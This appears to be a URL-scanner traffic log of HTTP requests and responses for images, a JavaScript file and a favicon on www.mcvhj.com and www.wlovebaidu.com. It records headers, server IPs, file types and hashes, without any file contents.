User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/index
Cookie: HMACCOUNT=A91EF2F2E757E669

                                         
                                         103.235.46.191
HTTP/1.1 200 OK
Content-Type: image/gif
                                        
Cache-Control: private, max-age=0, no-cache
Content-Length: 43
Date: Wed, 24 Apr 2019 15:55:45 GMT
Pragma: no-cache
Server: apache
Strict-Transport-Security: max-age=172800
X-Content-Type-Options: nosniff


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1
Size:   43
Md5:    ad4b0f606e0f8465bc4c4c170b37e1a3
Sha1:   50b30fd5f87c85fe5cba2635cb83316ca71250d7
Sha256: cf4724b2f736ed1a0ae6bc28f1ead963d9cd2c1fd87b6ef32e7799fc1c5c8bda
                                        
                                            GET /biwei/css/bootstrap.min.js HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: application/x-javascript
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:19 GMT
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   11320
Md5:    7bc6a5dd66ba1b5b913bfe9f36bc3c47
Sha1:   ac0da2a118312561bf72bec9922f02f121e4024c
Sha256: dd4aae0061697ee5801eaf22457efe09bd5b5f88bd5f7fce9309ee9f77a2b82f
                                        
                                            GET /biwei/images/logo-head.png HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:19 GMT
Content-Length: 3431
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Connection: keep-alive
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 234 x 42, 8-bit colormap, non-interlaced
Size:   3431
Md5:    dc082e3f5327a1d5c338fd0fdbc45d0d
Sha1:   6fb25501804a40f6520be4215f78ba91d52f0ce9
Sha256: 755ecaa27c73d8290c45954cdf48b717ab8cbde6899fcd9244575308100903af
                                        
                                            GET /biwei/images/partner-logo-sprite.png HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: image/png
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:20 GMT
Content-Length: 31172
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Connection: keep-alive
Accept-Ranges: bytes


--- Additional Info ---
Magic:  PNG image, 174 x 1000, 8-bit colormap, non-interlaced
Size:   31172
Md5:    e4b63339fb98ac450da5afc0eb780258
Sha1:   26ffc6d7d6c4ca020d64ce7a593dd4914f1b76d5
Sha256: c139231e48c9aaaf97d8920e4149b9c1d4e93658391cfdd668df092f3020af41
                                        
                                            GET /biwei/images/banner7.jpg HTTP/1.1 
Host: www.wlovebaidu.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.mcvhj.com/gg/biwei/index.html

                                         
                                         27.255.64.13
HTTP/1.1 200 OK
Content-Type: image/jpeg
                                        
Server: nginx
Date: Wed, 24 Apr 2019 15:55:19 GMT
Content-Length: 190745
Last-Modified: Mon, 17 Dec 2018 13:34:59 GMT
Connection: keep-alive
Accept-Ranges: bytes


--- Additional Info ---
Magic:  JPEG image data, EXIF standard
Size:   190745
Md5:    602a75135bf8ee551970e903888c6df1
Sha1:   5ce4132c475075edfd374650a27a9631e9f90cc7
Sha256: ceae17e667df9692431bf2fed8c94892cbf75719b72b3ba062d391a7edbdcd50
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: Hm_lvt_0f203c4517203805d75d02036cd6d835=1556121345; Hm_lpvt_0f203c4517203805d75d02036cd6d835=1556121345

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:49 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   606
Md5:    db8fd5e2079ea7b9e2d958db2727f993
Sha1:   83ce96be3c3518655233bdd700d1e277f7c3d55d
Sha256: 82f178a970efe9b87396229432903f1ece8ff30c6a21b1ec053ed9e9503b13da
                                        
                                            GET /favicon.ico HTTP/1.1 
Host: www.mcvhj.com
                                        
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Cookie: Hm_lvt_0f203c4517203805d75d02036cd6d835=1556121345; Hm_lpvt_0f203c4517203805d75d02036cd6d835=1556121345

                                         
                                         23.245.91.190
HTTP/1.1 200 OK
Content-Type: text/html;charset=utf-8
                                        
Server: nginx
Date: Wed, 24 Apr 2019 16:01:52 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
Content-Encoding: gzip


--- Additional Info ---
Magic:  gzip compressed data, from Unix
Size:   606
Md5:    db8fd5e2079ea7b9e2d958db2727f993
Sha1:   83ce96be3c3518655233bdd700d1e277f7c3d55d
Sha256: 82f178a970efe9b87396229432903f1ece8ff30c6a21b1ec053ed9e9503b13da